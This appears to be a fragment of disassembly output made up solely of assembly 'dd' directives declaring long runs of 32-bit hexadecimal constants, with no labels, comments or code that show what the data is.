dd 0A6A2E4E0h, 0F3358193h, 11C670F0h, 0A6AAC047h, 4BE7A342h
dd 0FF3BAA98h, 82D77A50h, 67F1E21Fh, 0F94E6115h, 3C3CF45Dh
dd 0F8B59A33h, 0D2384C17h, 0A0BFB11Dh, 0EAFFA47Eh, 0E15D3F2Eh
dd 0D5D48434h, 7FBB134h, 783C1B15h, 10FAD74Ch, 0B0EE8E8h
dd 0D307B7AAh, 0F9522C32h, 0BE1F75A8h, 0F451A509h, 8E8AEFC1h
dd 94AE373Ch, 15E6EA19h, 0F1EF5C11h, 6D74AD99h, 68F5FDB9h
dd 0E2364DF7h, 4CF8D56Ch, 7051A4EFh, 0B891682h, 320C9625h
dd 0A7F1AEC7h, 44C9A12Ch, 0E6F6F451h, 8905CB9h, 0F40F6C3Ah
dd 5D59EDEAh, 16528DEAh, 0DCA6E39Eh, 863217FFh, 3E81C4B9h
dd 3FD8B5DCh, 0E5FF4151h, 5D055FEDh, 0D504167Eh, 9B76CA95h
dd 23754F81h, 0BEF73B0Ah, 2F873B47h, 4BF19AE9h, 7FEDB3D2h
dd 25E1BA9Ah, 0EB742A03h, 0DC8B698Ch, 0E5A9DBDEh, 14930DA0h
dd 51D8BACDh, 8FF87078h, 96C77E0Ah, 0B56D588Ah, 0DE685F06h
dd 0BB5E7480h, 46B81D5Ah, 159C5022h, 0DDBA06E7h, 0BFA0F86h
dd 2F1EA445h, 723A66BEh, 0A20BA034h, 44DFFE1Dh, 3BD1B9F9h
dd 35983864h, 0DAE1C025h, 0FADD2A8Ah, 32E8A28Dh, 0F038E08Ah
dd 0D1ABE22Fh, 1BAA9C79h, 7E5F5BD9h, 0FEFC0225h, 41C9866Ch
dd 779F2619h, 0EB5F97B2h, 2FF0C3B9h, 0AE61A064h, 0D57A962Fh
dd 8D9F561Bh, 0CD371321h, 2FB53D93h, 0FE4D935Ah, 1EE5E46Dh
dd 4D3849F9h, 27692AE3h, 0D682131Ah, 0CAFEA45Ah, 0EAB2B6B0h
dd 0D9B1FCA3h, 4D58140h, 6F81EF04h, 0C651952Fh, 272B75EEh
dd 0ADD0764Dh, 25B816BDh, 9986BF83h, 39DBACF8h, 0D1C7734h
dd 4A4B7351h, 87E1EA57h, 53932D54h, 0FBEEA9EEh, 0BE38FBEEh
dd 76400006h, 6679DF31h, 3352CF45h, 5A9992DEh, 655763EBh
dd 20CDCB20h, 0C05C1C7Bh, 0C7E5C0BDh, 2BF520ACh, 0CAE071AAh
dd 7738E2B3h, 740F343Ah, 0BE38FAFCh, 27E58B68h, 32673EA3h
dd 0D351358Eh, 65CB695Ch, 0DD255022h, 0D2C5FED2h, 0D36162B1h
dd 71D8F182h, 62353786h, 31E2CCEDh, 948FCD74h, 0F7F8575Dh
dd 8D519B81h, 495630DCh, 5F8F7FB9h, 0D4342E44h, 0D22B73CFh
dd 7FB9EF8Dh, 7E8ACEBFh, 7B3F3306h, 27C3E54Fh, 0B45611C9h
dd 9635534Fh, 0BE49AEACh, 984746E4h, 0AAD48ECh, 0B6241DABh
dd 0D301DB5Fh, 0EF3283CAh, 8AF5371Dh, 3F4656D1h, 85C98D73h
dd 3EF6AA1Fh, 39787097h, 79D2AB5Ah, 7B2FCECFh, 0AE711C28h
dd 0B0AC81A5h, 0ACEC78A3h, 0C419EF9Ch, 0D4718700h, 0C2BEE2EBh
dd 0C6925675h, 0B138836h, 7667F66Ah, 0F1F445D6h, 8BD6C6FBh
dd 0DC20D29Bh, 0FBC55D40h, 52B660A7h, 5F49BAC3h, 82E5EDBDh
dd 3D94DB40h, 53CC961h, 0E153954Ch, 778F695h, 455D273Dh
dd 1FC29762h, 6ECFAD9Bh, 983987E3h, 97F7F796h, 0F7581E1Fh
dd 652BE054h, 94EE47E3h, 8A4B8B43h, 0E87E8BE8h, 0CF0DACAAh
dd 9A8E24F4h, 50BC5F2Ah, 0B6CE6158h, 0E5EE589Dh, 0F36ADE5Fh
dd 368DCECBh, 2BC056F4h, 28EC51B2h, 0B833D379h, 9EAECA9Eh
dd 69C0AC85h, 24651333h, 5D6CDFDCh, 3E1FE71h, 647E6629h
dd 0A5D9D6F1h, 42D5FD84h, 0EEF32A43h, 9D3BD9EEh, 0FE5EF099h
dd 9021E931h, 0ADF0B816h, 0B7823DFBh, 0C5E978F0h, 0CB62FAECh
dd 5B925C73h, 2F13FC17h, 15E92D15h, 0D4562CCDh, 0BD029CA9h
dd 0ACA32D30h, 2B181801h, 0AD55191Fh, 0E4EE6DB9h, 395EAA0Eh
dd 93A2DF2Ah, 4EF292ADh, 4F6BE861h, 7F7CC498h, 490AB281h
dd 709C4ED1h, 0EB77E739h, 0D415D5A3h, 0D8E1C680h, 882CCABCh
dd 5F576D10h, 0A4C52A5Bh, 0CB64A0E2h, 567F99CFh, 77FD757Ah
dd 97514A36h, 83395E81h, 216A0BB8h, 0B4633391h, 55792351h
dd 47E0B9DCh, 13DFC609h, 0C95DEFB0h, 8DC17EFAh, 3EE4033Eh
dd 0C9C3DA3Fh, 0AF34923Ch, 515977A9h, 0E4E61509h, 0B41E6EECh
dd 61902A34h, 25248D7h, 79D0A3E1h, 0C149FF55h, 0E18C6C52h
dd 16079C22h, 836A93AEh, 5BCABF0Bh, 0FD71BC20h, 9552F19Ch
dd 7D463C5Ch, 5EBFABBFh, 0B053670Eh, 0E8AE24B9h, 0DE5289EBh
dd 0C0F014EDh, 0AE94AF59h, 2785757Ch, 0C84ED4BFh, 48E1B58Fh
dd 32DE128Eh, 71C3AEB2h, 0CFCDFB1Eh, 2C0F7B1Dh, 0A7D03497h
dd 517B631h, 4C4F57EDh, 0B63EDA40h, 0A7152DF2h, 8546529Ch
dd 0A7A18EE3h, 0BB39FDCCh, 0F7A94B73h, 83E29ADDh, 0AADC4A41h
dd 332F442Bh, 0DB0810Fh, 0A06CBD38h, 0CC8986F6h, 0A94DE31Bh
dd 1185DC03h, 4BE784B8h, 11CD7BBDh, 0EEAB4112h, 0D8B75529h
dd 8F1DF5AAh, 0F47633EBh, 5AE4636Eh, 0DE52F01Eh, 9EA6E7B5h
dd 9F6D96A0h, 0E7BDDB0Fh, 0B72164E6h, 7862F251h, 1CD26379h
dd 987F3063h, 0B5C6B616h, 0E8ACB604h, 112AB52Ch, 0F7D111D0h
dd 727286D8h, 6E9BCCB5h, 5686F537h, 97B56AAh, 0D5A026CCh
dd 7466B667h, 39C73F23h, 7290ACD6h, 8874B255h, 0BAB66099h
dd 3C6E1DE7h, 917565F0h, 4E810F32h, 935255CEh, 0B479C414h
dd 97574D15h, 98FE066Ch, 0F6B9D6C6h, 0CD8E2B26h, 6A163F5Dh
dd 0F19EC475h, 1CED8D26h, 47CB3145h, 24B1D9AEh, 5515F020h
dd 29B32FFDh, 0B08076A0h, 0B2356051h, 27F6682Ch, 0A35C308Eh
dd 4C4AC19Ch, 0B46CEA91h, 2D92611Dh, 534EEE79h, 5515A962h
dd 0CC114545h, 244E5BCAh, 0A79AE454h, 69A17C58h, 6546331Bh
dd 551C3F13h, 0B740D922h, 5DE3C3F4h, 2E9DFD96h, 0B5142DC6h
dd 7C39892Ah, 12BB13CEh, 0E57CAC89h, 57603D99h, 0DAA0FBE4h
dd 2A3B84EDh, 41F03E47h, 3F3B54CBh, 813486CEh, 0EE2DA76Ah
dd 42B0FADAh, 326D588Ah, 5A9A787Eh, 616B3D54h, 0E22540CEh
dd 0FD5CB459h, 5B75FA77h, 9B7BD7B5h, 0A1EE3FABh, 419D6480h
dd 0EF143573h, 0BA38986Ch, 1861F42Bh, 28098C6Ch, 0DB3BF436h
dd 53AB5EEEh, 74497FCAh, 4FB77FC5h, 88FED283h, 262C2D1h
dd 5E2C6A43h, 0C449A7D0h, 0A9C43453h, 0AD1D7DCDh, 5E4AA66Dh
dd 692759BEh, 0F17FA5E4h, 0D9701E39h, 87107B6h, 8F15563Ah
dd 3C928F83h, 0A3F763E7h, 0A3391CF0h, 223F458h, 0D6ED92B4h
dd 7081F87h, 0FCAE7EFCh, 6529D666h, 0ADC3268h, 0BE78005Fh
dd 0E81AAFB4h, 8E533905h, 0A5188104h, 69BDBDD8h, 6C3F0C5Dh
dd 79B0E7Dh, 0CD4A7E8Eh, 60EDBA94h, 0C4AB3687h, 0F3F811EEh
dd 0DF3FAB81h, 0EF87BB65h, 0EA921B93h, 0E761E2F7h, 1F453103h
dd 7D1F8F8h, 46938B89h, 77B20924h, 88A01C72h, 9621AC1h
dd 4355CB11h, 6FD6AEDh, 506AD56Ch, 215E4F15h, 725E989Fh
dd 0BC64837Eh, 83C34C4Ah, 0B24D2727h, 8E5F843Bh, 22E9C4A6h
dd 0FDFBC476h, 95FF1E05h, 0F31FD080h, 5BE38137h, 0A8BB571Ch
dd 0CDBCE768h, 65B0ED18h, 0B5BF37BDh, 0F0C5D283h, 9CB47D96h
dd 6DA2F681h, 3359623Eh, 41F82587h, 1A49C589h, 0F56FBEEh
dd 96AB92A3h, 0F60D7FEAh, 956C7A94h, 6ABB5F7Ah, 30F6146Ah
dd 0C8A90580h, 7D8FDC75h, 2CF45CA6h, 0FB2AC3E7h, 832712E1h
dd 550DFE7Dh, 9F622DB7h, 70997B5Bh, 455F14DBh, 5C1E2768h
dd 5DAB0F18h, 3912D23Bh
dd 0E1585A29h, 7974F525h, 0AB4CD87Eh, 481AB7D6h, 0CC461CD3h
dd 57C6732h, 644DA454h, 1A971B67h, 0B6EC309Dh, 0A51ADFAEh
dd 56CA752Ah, 7D3A3A4Ch, 305AF980h, 3573DABBh, 0A0E39AAAh
dd 0BBD9C28Dh, 88B84AF8h, 33108F57h, 70FA7358h, 3965FC6Ch
dd 0C4A89161h, 0B5D090A9h, 23CDDD34h, 3C9D87Eh, 7DDEF243h
dd 6A11C948h, 617C52FFh, 8A52DE3Fh, 87E0B926h, 45E553CDh
dd 9F6D758Bh, 0D964A3D9h, 0DC65310Bh, 624D6BE7h, 0FA17B02Ah
dd 0AC9690CAh, 0AC3113A8h, 0E1C378ECh, 0D5361AF3h, 0D32159D8h
dd 0AE3836B5h, 9FB18E70h, 4F861F11h, 233E4A1Bh, 0E2706A05h
dd 90F7AE9Ch, 785DCEDh, 0FCB0E8C7h, 9D100CC0h, 0C17DFC02h
dd 0F13778FCh, 0FFEF7767h, 0F7569773h, 0F72DF513h, 463F6A22h
dd 0EB68BD1Dh, 0F7D79A39h, 0BA6D34A2h, 57333024h, 4ACD2671h
dd 0E1F984E5h, 4971F5B8h, 68F3EC95h, 0D061A259h, 0D1A6BDFh
dd 67ECA14Dh, 59193910h, 191C75A0h, 82B38DA9h, 644E7061h
dd 7E752E62h, 0A441B7F4h, 0E8AE9319h, 9B9C9F64h, 93FD6FB9h
dd 7CE7EE35h, 99988E19h, 30555BD8h, 48DBA1B2h, 8CEDC57h
dd 0B85D868Dh, 3387E07Ah, 270C565Bh, 7340F701h, 33FBA702h
dd 2EDB77BCh, 31D8F288h, 0D94F4053h, 9C578F63h, 3CDC2D58h
dd 3785B80Ch, 9C031259h, 4A7EDAC9h, 2B660FBEh, 0AC6AF4EFh
dd 709F8538h, 0CA89C094h, 0A63F19FEh, 7C765B30h, 831263E2h
dd 161D6D2Ch, 0B80B54BFh, 4221C82Fh, 0D1FE8A1Eh, 92F2184Ah
dd 15C5B22Bh, 9F535677h, 8BF5C8B5h, 0DBAB092Dh, 5F949E99h
dd 9DE51AEDh, 8940B242h, 0A2056F02h, 340BDAE1h, 0A8725F0Ch
dd 1AE65AABh, 0AC6F1789h, 6845B55Eh, 9A998049h, 1307373Ch
dd 0D927D8DFh, 0AA9A4B02h, 0A41594DEh, 49C32CCh, 82B0AE1Fh
dd 8EBF521Fh, 0F1E7D658h, 5AF2149Ch, 174B294Ah, 0AFC33E92h
dd 0F8D8109Ah, 3BD90A66h, 606E1FD5h, 0A4038056h, 418C856Dh
dd 0BD4FFB0Dh, 4A0C13F2h, 0F668212Bh, 0DA81F69Dh, 0A6C931E2h
dd 5EB2D800h, 65F1E201h, 0F9A44A1h, 894B71ACh, 74E56D33h
dd 414515B5h, 0FF6F7E9Dh, 0D349174Eh, 42E0F6FCh, 0A5680928h
dd 0B5FF9542h, 96B69363h, 0CC3E4549h, 36D668D5h, 8459B464h
dd 5AE4BE32h, 79A13E2Eh, 8E5BF064h, 0E348F4C7h, 9BB799F7h
dd 0F87A1E8Bh, 7F204FC0h, 0E306D66Fh, 0DBE6BF06h, 9E6FEFFFh
dd 44A65317h, 410830DFh, 4A407CC5h, 0AE5B8CE0h, 1489B15Bh
dd 2FFBBE42h, 0FA4FA852h, 35CE30C5h, 55A9F69Ch, 0E1B85365h
dd 912AACC8h, 8DF53C57h, 7984FFF8h, 7B8BA1F8h, 763E11A3h
dd 49BE25C9h, 0B1CE5CAh, 0A85A1D68h, 0AC8289F9h, 3775A08Ah
dd 0B9DBE762h, 0F69CED38h, 45964A43h, 756F90FBh, 7A388B56h
dd 4FD714B6h, 0A0AE380Fh, 6CC923C3h, 72EFF76Fh, 0F03CDA3Fh
dd 3C5C156Dh, 0CAB12414h, 846DF4BAh, 46035676h, 7C50B315h
dd 0B4A157E1h, 0D68DBA6Dh, 1DCD6CAAh, 0FDA745Fh, 0F4225A17h
dd 3E166DD0h, 2A9F0978h, 362A8939h, 1DD81D73h, 0C532B9D9h
dd 508ABF23h, 7DE6A0EDh, 0C82A9AF4h, 7E5EFBEFh, 10BD4EFCh
dd 2F4EDA2h, 2EBD6B5h, 0DD6BC589h, 3452B374h, 0DA198AB2h
dd 80B6118Bh, 21377B4Ah, 0AB35563Ch, 89B3948Fh, 4D230DF9h
dd 3B2B90D2h, 391E822Ah, 2D35C8C5h, 66B19FCEh, 0FF3AFE8Bh
dd 4F1F91Bh, 1685F847h, 5B58F0D4h, 519073E3h, 4799FBADh
dd 99CB37AAh, 665E5F27h, 7F93A686h, 2289D1CFh, 4902399Dh
dd 0F9F0235Fh, 8D8FC0F1h, 1E846E87h, 0FDF3230Bh, 615B7CCBh
dd 0C84571FDh, 10FC4129h, 3EF9E0F7h, 29F365DBh, 195587D8h
dd 0C67E4717h, 0B234CC4Ah, 4AC3B16Fh, 0EBAA6B6Ah, 257D6B47h
dd 93F2AD61h, 4739F6CDh, 5E25BC03h, 999310E7h, 0BEDD0F25h
dd 0CD40BF8h, 0E563DCB1h, 443B7BA2h, 8DAB78DAh, 0F6F8A11h
dd 0E180B502h, 2FEA3AC8h, 4A6683FDh, 26DE89E3h, 17844EE7h
dd 6142E852h, 0F036CA46h, 9BDBA2D0h, 92D3D73Fh, 3D456DEAh
dd 328DB259h, 49FA16E3h, 0D8B69277h, 864F85C3h, 7C4A1E77h
dd 44BB4357h, 56A99B41h, 0F455595h, 928C263Ch, 51AF7BEFh
dd 0FBE317F8h, 4E56BD1Dh, 52ED7E2Ch, 0AE09EB47h, 0A10524F3h
dd 69F7E603h, 0AAB336C5h, 0D6BBF638h, 0C3C2FF7Ch, 83901353h
dd 70A2A0Eh, 809CFA60h, 0A7D29D74h, 25055B41h, 91232975h
dd 0FEDAA48Bh, 3F1FFF38h, 2FB38D84h, 0C7DC16AFh, 0C9541399h
dd 11AC2F93h, 147B7F6Bh, 837D7E57h, 0D7419B68h, 59FF6862h
dd 7195617h, 0AAA19916h, 595974EAh, 9417D15Bh, 0BAFE2B74h
dd 4B5F0ACDh, 0A91C1486h, 74CD9567h, 32DD9946h, 0FEFE66A1h
dd 3F985944h, 0E32AA1B0h, 3D1D42D0h, 1047E5E9h, 8C0C04E8h
dd 0B113F450h, 2FD6F57Ch, 1516F9C1h, 0C2C09276h, 70DA930Fh
dd 0D5C4F260h, 0E45C43CAh, 79DBA11Ch, 1AFCAC78h, 68E62CE4h
dd 0DC696355h, 7F11E799h, 65537FE5h, 0ECBB4456h, 0DDE6FBE3h
dd 0B7D33C71h, 3C59E7CBh, 0E3586D70h, 8526A656h, 0D68E7EB6h
dd 4A8E32D1h, 0A9C148B8h, 7D2CC9F3h, 4EC92A87h, 0FA495593h
dd 0ACD7B22h, 33B528AAh, 94F5173h, 1197181Eh, 85394407h
dd 485FC6AAh, 0AD084875h, 0B338BEEAh, 7668191Ch, 32B5E28Dh
dd 9E7E5773h, 0F2EECD37h, 0A485E707h, 566B9978h, 66655F80h
dd 0B416E27Eh, 0FF79F024h, 0EEB18F62h, 95EE89B0h, 176DE86Bh
dd 3BA79133h, 0B7F5D7B3h, 0D69EFCAAh, 7C738DF9h, 0AC142BEFh
dd 0F82BFC49h, 24773498h, 7CB93C35h, 5F14121Dh, 0D28A1EE3h
dd 0DBF4F94Ch, 9768F146h, 8C7A95E7h, 0B0FCE3ABh, 76FA552Eh
dd 0C656270Bh, 0E3156909h, 4BB47FEBh, 0EC9263BDh, 0FF7566Ch
dd 93B30D3Bh, 6E551780h, 7DDCA2EEh, 0BEC8CFA7h, 0B6F23802h
dd 0EA935FEEh, 0AF6BBDDAh, 0B4EB738Dh, 2669A5Fh, 0C612A6EAh
dd 0EF096D9h, 58F70924h, 451AC56Ah, 54CB952Bh, 20324755h
dd 86E4EECCh, 0C1E531BDh, 7A2E1AD5h, 6033C496h, 0C97140D6h
dd 60555597h, 168243F7h, 6761A573h, 0CAC1C9ADh, 0D3603D2Fh
dd 0DF644F31h, 662830B3h, 0B4565805h, 0FB2878E9h, 481DC7E0h
dd 0F9A31B35h, 556DACABh, 12C0A411h, 3AD90E89h, 4A73FCF7h
dd 4C7B1CD8h, 0AB9FAAE2h, 0C58155A9h, 858B2C7Fh, 5A8249ECh
dd 0BBC016C4h, 6462EA0Dh, 2C4FFE62h, 9A39EEE2h, 0AD79396Bh
dd 34EB3484h, 1C018B5h, 0AE923911h, 0DED0D1F8h, 0A120945Eh
dd 855E699Bh, 41D43FDBh, 6173FBA7h, 0A8D7B16Ch, 0D4175629h
dd 66A4CCDDh, 0F8F66839h, 1F8DAB86h, 6EFD0BF1h, 0ED5D6E6h
dd 6894CA7h, 29F4A3B3h, 1F812CCDh, 4631AD2h, 9355FF4Ah
dd 63D9FEFBh, 0FC868DBh, 0FED4B66Bh, 0FD8E5C23h, 7F2F303Eh
dd 6237E665h, 0DB7FFDCh, 0B7E58F86h, 0FAA9D10Dh, 0E8FBE660h
dd 0A7556333h, 0A4349FDFh, 0A0ACE8AEh, 33EF5490h, 69EB9B62h
dd 0AF87E554h, 0F68C21E1h, 4FA4723Ch, 0E4DA22BCh, 2922E0h
dd 0A918CAAEh, 65877EC0h, 0FAA82330h, 1A84C5C8h, 2D0F0F9Dh
dd 0E776ED56h, 0A1A92C34h, 0C82BDB46h, 9E8E80DFh, 0A640B506h
dd 63559545h, 0E88BFC2h, 51BA19Dh, 455CAC3Fh, 3E4D7C8Eh
dd 627D794Eh, 5AD13035h, 7C54C6F2h, 3DA89DC0h, 3AAEF163h
dd 0C98879FEh, 0DFF50167h, 365B23E7h, 0D38559C1h, 293B1B7Eh
dd 39F76E91h, 0EEF2387Eh, 31311791h, 0A779EFCFh, 9A695BC1h
dd 0FA4C99E5h, 9D3FECE6h, 5FAA0383h, 0FC9789ECh, 3FA4A04h
dd 0F957272Fh, 0BE6A8E4Dh
dd 2D475071h, 0BA2B598Fh, 60941DA2h, 72B7EDD4h, 3260EA2Dh
dd 0B35044CBh, 57FE54ECh, 36E2FC69h, 0AA4BFAD3h, 13EF6544h
dd 0FABFD562h, 1F467370h, 0CFBC6C3Fh, 0D095E801h, 0BC37526h
dd 0A46EAF3Bh, 0B43BCCBEh, 11539B25h, 7C0A4ACh, 5B380E27h
dd 2527AC5Ah, 87E58B48h, 1972448Dh, 1C1E0161h, 3D210662h
dd 0CD822BC7h, 0A7B3566Fh, 2959ED18h, 0BF99FCCDh, 2186B1A0h
dd 0DF781857h, 1AEFA264h, 0C393856Bh, 0BC805544h, 0AB53932Ah
dd 0EAEA9AE7h, 6581F581h, 230FF2DDh, 18587B45h, 756A48ECh
dd 0BEC5F030h, 0D069413Fh, 0BF384EE6h, 3491BE7h, 29D3B5F4h
dd 9D4B9746h, 0E7ED6570h, 5369E9BBh, 383C7A35h, 0B87654BEh
dd 617EE781h, 0EAF4C565h, 13B78AAFh, 5B24F856h, 21F82ACBh
dd 5A2FBF4h, 9BCF08E6h, 8DBCDBCDh, 6C1673BEh, 826354C7h
dd 94AB6774h, 6A713511h, 760524B4h, 0E89A5635h, 147F2A91h
dd 1199E9DBh, 0C42EB62Eh, 64D8C4C5h, 84073FF0h, 0E544DDC9h
dd 3E70ABEDh, 0AB1A27B2h, 1E7C9075h, 456A3ACEh, 991EA68Dh
dd 5258F683h, 6D4C0699h, 9F1233B4h, 0AFDB1D0Bh, 0EA9330ECh
dd 0F95F8B36h, 457E4692h, 85705077h, 0D3A11787h, 0EDBCE4D4h
dd 131370DFh, 0B5F75189h, 0EE6D8B40h, 0DDB3F6A0h, 0F89F154Eh
dd 72069B50h, 5C4FF3ADh, 39D54B88h, 0E46BBAC7h, 0D261A27Ch
dd 0A27F7F74h, 56D0A2A8h, 0E21B712h, 5657EB44h, 88C7578Eh
dd 0C65450BEh, 4F7AAEB9h, 447272E5h, 0ABD1AA4Fh, 0B112FF04h
dd 432AC8AAh, 3AE4A3F4h, 0A26AA532h, 66B38D62h, 4FDBC56Dh
dd 0A571DA2Fh, 0AF77FA1Bh, 5E13F86Ah, 22C55741h, 0A990A015h
dd 0B728D279h, 0DCECFC66h, 0A382E536h, 0E12F5C05h, 291C2EF4h
dd 0A7957F1h, 9B9387C9h, 0FF1CA68Eh, 9444F9FEh, 8778EAF8h
dd 0DEAAAB71h, 111E624Fh, 2376850Eh, 2612C599h, 6545355Fh
dd 0D3B98BD0h, 89341437h, 0FB71E363h, 988D0B87h, 895745Ch
dd 0AB215AD1h, 0FB1669B4h, 0E3544783h, 45F39817h, 76853A99h
dd 66647D37h, 0F39EC21Ah, 114FB8EBh, 0E656AEh, 5499BEE9h
dd 0D99707CFh, 0A579E97Ch, 0B25C5036h, 0BDFAFAF2h, 11758520h
dd 342B23E2h, 3F2557Eh, 0F1D51CAFh, 29FDAC59h, 0A5172FCh
dd 474F033Bh, 5B5EF76Bh, 98320EC7h, 0F77B3578h, 0B6279A9Dh
dd 1252F622h, 28BF7E88h, 0C14C37h, 6139699Fh, 74C865F8h
dd 3DF872E7h, 8BBE737Bh, 1263F21Ah, 0FF355A05h, 15B60B45h
dd 96DD9487h, 6D11BE9h, 0EE133AB1h, 34278B80h, 594CFBADh
dd 9012EDF3h, 0CB656735h, 9AA17D62h, 69A4565Eh, 7EE736Ch
dd 7CD2B68Dh, 0F0AC6DA7h, 0EB895B03h, 509DF1E4h, 0B11F253Eh
dd 4D39267Dh, 1E7C81D5h, 9EE930DDh, 9A6D3F0Fh, 2C90B72Ah
dd 8DDBB3A0h, 1F545103h, 7583B398h, 326E3AA3h, 3B992A95h
dd 8166FF4Dh, 72AB5B35h, 8825EED9h, 0CF806BB8h, 8C1D0FC6h
dd 508B24D7h, 1112A32Dh, 0AA42E6D7h, 3ABE23F3h, 0C2D11902h
dd 4931597Eh, 9025057Fh, 0F4F10C4Fh, 0D088696Ah, 0D0F5E2E6h
dd 0B85EEE65h, 9C552B0Bh, 0A84ECE9Eh, 3EB451CEh, 9A430757h
dd 0A740BA8Fh, 1419EB0Fh, 0B8A49F27h, 0AD129C13h, 56743950h
dd 77F2E955h, 48F2F2AAh, 9A4516D8h, 9F97071h, 3C52D9FAh
dd 5C9858A9h, 0AC533442h, 62FCEAB2h, 83BD31F6h, 1439AFF7h
dd 4A168762h, 760288BEh, 56BF41A9h, 75E6B970h, 8844902Fh
dd 270A5EE2h, 2F6F62D1h, 44FBC907h, 0BD80FB67h, 0D12741BCh
dd 2C9C48E8h, 0B121D494h, 0D68C8E53h, 86AA7331h, 0DF5FC56Ah
dd 0FDF84CB4h, 22D0B38Bh, 492B2FF2h, 59CEBF79h, 4644FA1h
dd 0DC36AEA3h, 0A7BC95B7h, 6509348Ah, 0FBD58917h, 948D4724h
dd 0B4E7D965h, 1B85AA11h, 0BB35AC17h, 97CCA026h, 4E98E363h
dd 87EA60CFh, 9DF3DD4Ch, 0FFB88689h, 985C607Eh, 31BF5D87h
dd 0E89DDEFBh, 5AE17490h, 81A1B9h, 194E3163h, 0CF4FD76h
dd 0A36B0F9Eh, 0BC2F2366h, 65F71D68h, 0CFFA34A6h, 0BF0BE069h
dd 3A8A3A1Fh, 8FC8C2C8h, 0EF31F468h, 0AAF25312h, 3565D27Ch
dd 30A9883Bh, 1ABAFBF7h, 0AD2043F1h, 0B993EB16h, 379253D0h
dd 93BF487Eh, 8FC7ED8Eh, 6673411Ah, 0FD8A04B6h, 8BE7BF0Ch
dd 42A7E2D7h, 4BF1AC6Eh, 38EDA939h, 0C0F8A865h, 995CDBD0h
dd 5510A899h, 45B8C317h, 0C79BE643h, 53C47388h, 28257455h
dd 0A3933836h, 6D50F0BFh, 6FB391B6h, 89E7F2F6h, 0B8CA42FFh
dd 82BD8770h, 5FA2D11Ah, 3B68A367h, 0FA528D29h, 408D80D1h
dd 6110656Eh, 0F62D3AD7h, 0B01313ADh, 76F0BA89h, 34AD33A5h
dd 0B6B6BBEFh, 45465A25h, 5BF0C892h, 2CAB0A46h, 0A30BE4DEh
dd 9F8E4A95h, 5A819BA8h, 0D7EF6FF7h, 7F8CE4DCh, 0AEFD98C6h
dd 590BAF77h, 0EA6EAA55h, 0F52BEA06h, 37D5CEAFh, 0B44A6139h
dd 524F8896h, 0B4BADFF1h, 0D4FDDD6Eh, 0FBDF157Ch, 252542E0h
dd 969628AAh, 0B6F09DFEh, 0B6DCABABh, 0D9874271h, 0DB2A128Bh
dd 777B233Bh, 0B04FB8B4h, 380B26BCh, 24A8B453h, 0A95ACD1Bh
dd 0A6ED4539h, 77AB2BB5h, 1ED4931Dh, 6F5F1FECh, 0DE747346h
dd 0D162255Eh, 1AD7B9ECh, 16B8447Ch, 525DF40Bh, 1D7BFEF1h
dd 0F55D2302h, 0A33EB6CEh, 36AB25E2h, 74A63345h, 0B83AF587h
dd 2C563A20h, 85B8D14Ch, 239AEEC0h, 6A647307h, 0E986A67Dh
dd 9D834FF8h, 109EA6C2h, 42D1E132h, 0E1EF0CEDh, 0D0D5D2FAh
dd 0BAF4ACB2h, 6DDC957Ah, 3B922979h, 0B0B235D6h, 70C8D122h
dd 747EB0C1h, 3657F195h, 3CCDAFDh, 0CE2DEDD4h, 320AF2ABh
dd 7BFCA9BBh, 194F492Bh, 0FEE5A288h, 9E85B750h, 5F9DFDDFh
dd 4ADFC2F6h, 0B7D63CD4h, 83056F74h, 1D14C172h, 49E0B34Ah
dd 7AC95A21h, 2847E49Dh, 23ABBE17h, 78D5EDF0h, 2D706EBDh
dd 6CEA0EC6h, 968AC2ACh, 0AA1724FAh, 160657AAh, 42ADB64Fh
dd 4A3D56FFh, 71C725F8h, 1939207Eh, 0D6744D7Bh, 0A463BA73h
dd 0C94993A8h, 0D290909Fh, 712B2E11h, 554B69E6h, 9AF993B6h
dd 33C2274Ah, 61ED34DFh, 0C1F0CABBh, 0FCEEFEDFh, 6F9A3F29h
dd 0F411CBD3h, 2936FCD1h, 2529B74Ah, 0E44912F7h, 0F87A4E8Ch
dd 9FDFFA39h, 587FE330h, 0D606DE60h, 85522A27h, 135D9AE5h
dd 0C6EB217Ch, 0E3AB5A94h, 5D79152Fh, 5D2F5BAEh, 28611A9Bh
dd 156CF8B8h, 0D396BBEEh, 0A9C287B1h, 3338BE13h, 5EF67FB5h
dd 0D6BCF1EBh, 0A1372DDDh, 64845C16h, 0F81A551Bh, 0C1554AA1h
dd 1A80ADE1h, 120A9FC8h, 0EAFEC2Dh, 0AD8F54AEh, 0FA2F8BB1h
dd 13BC4DCBh, 1907523Ah, 9C57EF19h, 2D1CDFA5h, 6EFE46E5h
dd 41E46BA7h, 6A6AE6D2h, 5D2C5447h, 625FAB6Bh, 151AF6ACh
dd 57CEEDBEh, 2363A521h, 0C06AED17h, 93B61305h, 1A57288Dh
dd 0BAA32D4Ah, 2F63A4B3h, 0E3CC1356h, 838A9D81h, 0D835E614h
dd 62C5E552h, 0F58E8F33h, 72AB8B48h, 6DDE300h, 3B621C3Dh
dd 15F39223h, 0C221954Fh, 69DF8F98h, 91C8968Bh, 0E5B70388h
dd 50AF8BF1h, 0BA74553Dh, 0B3A7C33Ah, 0A1D19427h, 0E652ED38h
dd 29DD727Eh, 44498AA1h, 1363850Bh, 846474D1h, 6894D5AFh
dd 4CFE22ADh, 0CFC558A9h, 8D1586F8h, 2A7EC1A9h, 83BB767Ah
dd 45693E1Fh, 8E4662DAh, 24C53693h, 656AC373h, 0C4B0E262h
dd 0DF05F5C4h, 81BD5949h, 3CAC4ED2h, 12D61C85h, 0C5EACA58h
dd 0C9B7F9B4h, 171DF6D7h, 0B2B37919h, 0CEE153D2h, 658BFC0Fh
dd 187F908Fh, 0C0EF0F8h, 68CBBE6Ch, 0FCE91E9Bh, 122EF2FCh
dd 0C9175FB4h, 0B938B74Ah
dd 2283E3F1h, 210C987Eh, 7EC67B6Ch, 87B766F1h, 7C465CFh
dd 224DFC6Fh, 62E2E86Eh, 0F0058EB7h, 9B2F8446h, 55DDF37Fh
dd 68660587h, 7437E42Bh, 4442AE82h, 131B33CAh, 0A120ABC3h
dd 64A892Fh, 0C85864DBh, 0B1CA24C9h, 9E9AF56Dh, 0AF72E313h
dd 0F393CD32h, 52EF7DB3h, 355C6AEBh, 0F37A4B81h, 6014E1BFh
dd 4B40CE2Bh, 4FFAE81Fh, 7B71B803h, 333CBD01h, 0DA0D351Ch
dd 0E2BCF709h, 1253D587h, 88125C75h, 21145FE5h, 7F375136h
dd 42B86849h, 1E14F34Bh, 27242AF0h, 7E48A86Fh, 0DF9255D2h
